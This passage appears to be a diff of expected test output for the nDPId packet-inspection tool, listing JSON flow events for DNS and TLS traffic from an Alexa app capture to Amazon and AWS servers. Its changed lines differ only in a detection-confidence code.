00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1490976093238,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1490976093238,"pkt":"AMDKkaPvePiC0\/vCCABFAABEWltAAEARM1SsECrYrBAqAaKnADUAMOTtwQkBAAABAAAAAAAAC2RwLWd3LW5hLWpzBmFtYXpvbgNjb20AAAEAAQ=="} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1492,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976093238,"flow_last_seen":1490976093238,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976093238,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"dp-gw-na-js.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1492,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976093238,"flow_last_seen":1490976093238,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976093238,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"dp-gw-na-js.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1496,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1490976093355,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1490976093355,"pkt":"ePiC0\/vCAMDKkaPvCABFAABr3WJAAEARsCWsECoBrBAq2AA1oqcAV3huwQmBgAABAAIAAAAAC2RwLWd3LW5hLWpzBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAAIQACwhkcC1ndy1uYcAYwDQAAQABAAAAFAAEsCBlNA=="} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1496,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976093238,"flow_last_seen":1490976093355,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976093355,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"dp-gw-na-js.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"176.32.101.52"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1496,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976093238,"flow_last_seen":1490976093355,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976093355,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"dp-gw-na-js.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"176.32.101.52"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1497,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976093358,"flow_last_seen":1490976093358,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976093358,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1497,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1490976093358,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976093358,"pkt":"AMDKkaPvePiC0\/vCCABFAAA88bJAAEAGXMysECrYsCBlNKvhAbv82ZN1AAAAAKAC\/\/+6GAAAAgQFtAQCCAoA9mLHAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1501,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1490976093481,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976093481,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwL+xAAOcGd56wIGU0rBAq2AG7q+GBdUC1\/NmTdnASH\/53tgAAAgQFtAEDAwY="} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1503,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1490976093486,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976093486,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo8bNAAEAGXN+sECrYsCBlNKvhAbv82ZN2gXVAtlAQAVfCJwAA"} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1504,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976093358,"flow_last_seen":1490976093491,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976093491,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01451{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976093358,"flow_last_seen":1490976093953,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3594,"flow_avg_l4_payload_len":449,"midstream":0,"thread_ts_msec":1490976093953,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","server_names":"dp-gw-na.amazon.com,dp-gw-na-js.amazon.com,dp-gw-na.amazon.co.uk,dp-gw-na.amazon.de,dp-gw-na.amazon.co.jp,dp-gw-na.amazon.in","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"fbe78c619e7ea20046131294ad087f05","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=dp-gw-na.amazon.com","fingerprint":"27:E5:06:34:82:69:BC:97:5E:28:A3:C1:5A:23:81:C7:E3:28:95:8C"}} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1504,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976093358,"flow_last_seen":1490976093491,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976093491,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01451{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976093358,"flow_last_seen":1490976093953,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3594,"flow_avg_l4_payload_len":449,"midstream":0,"thread_ts_msec":1490976093953,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","server_names":"dp-gw-na.amazon.com,dp-gw-na-js.amazon.com,dp-gw-na.amazon.co.uk,dp-gw-na.amazon.de,dp-gw-na.amazon.co.jp,dp-gw-na.amazon.in","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"fbe78c619e7ea20046131294ad087f05","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=dp-gw-na.amazon.com","fingerprint":"27:E5:06:34:82:69:BC:97:5E:28:A3:C1:5A:23:81:C7:E3:28:95:8C"}} 00191{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1524,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":35085,"global_ts_msec":1490976094729} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":1524,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":35085,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1490976094725,"pkt":"AMDKkaPvePiC0\/vCiQ0CDAoBZRIAwMqRdPh4+ILT+8IAwMqRo+\/dFACgxgAAAAAAAAAAAAAAAAAAAAAA"} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1586,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976088937,"flow_last_seen":1490976099286,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":802,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976099286,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1586,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976088937,"flow_last_seen":1490976099286,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":802,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976099286,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1598,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976100559,"flow_last_seen":1490976100559,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976100559,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1598,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1490976100559,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976100559,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8EgZAAEAGAiWsECrYNu8YuoUZAbtS0XeRAAAAAKAC\/\/9pqQAAAgQFtAQCCAoA9mWXAAAAAAEDAwg="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1600,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976100811,"flow_last_seen":1490976100811,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976100811,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -561,18 +561,18 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1607,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1490976100999,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976100999,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA0s4IAACcGiho250hYrBAq2AG7o2ETwX1YiAldXIAS\/\/\/2XwAAAgQFmAMDCAEEAgEB"} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1608,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1490976100999,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976100999,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoBwFAAEAGDT6sECrYNu8YuoUaAbt\/SWKyQ51EmVAQAVeW5AAA"} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1609,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":3,"flow_last_seen":1490976101000,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976101000,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoOO9AAEAGq7msECrYNudIWKNhAbuICV1cE8F9WVAQAVc8uQAA"} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1610,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976100811,"flow_last_seen":1490976101001,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976101001,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976100859,"flow_last_seen":1490976101001,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1490976101001,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1614,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976100811,"flow_last_seen":1490976101100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976101100,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1621,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976100859,"flow_last_seen":1490976101182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":339,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976101182,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01340{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100859,"flow_last_seen":1490976101183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":2974,"flow_avg_l4_payload_len":371,"midstream":0,"thread_ts_msec":1490976101183,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","server_names":"s3-external-1.amazonaws.com,*.s3-external-1.amazonaws.com,s3-external-2.amazonaws.com,*.s3-external-2.amazonaws.com,*.s3.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com Inc., CN=*.s3-external-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"C0:51:D8:FA:6B:58:94:F2:3E:4E:7D:B2:36:5F:02:E4:F0:3F:54:FF"}} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1610,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976100811,"flow_last_seen":1490976101001,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976101001,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976100859,"flow_last_seen":1490976101001,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1490976101001,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1614,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976100811,"flow_last_seen":1490976101100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976101100,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1621,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976100859,"flow_last_seen":1490976101182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":339,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976101182,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01340{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100859,"flow_last_seen":1490976101183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":2974,"flow_avg_l4_payload_len":371,"midstream":0,"thread_ts_msec":1490976101183,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 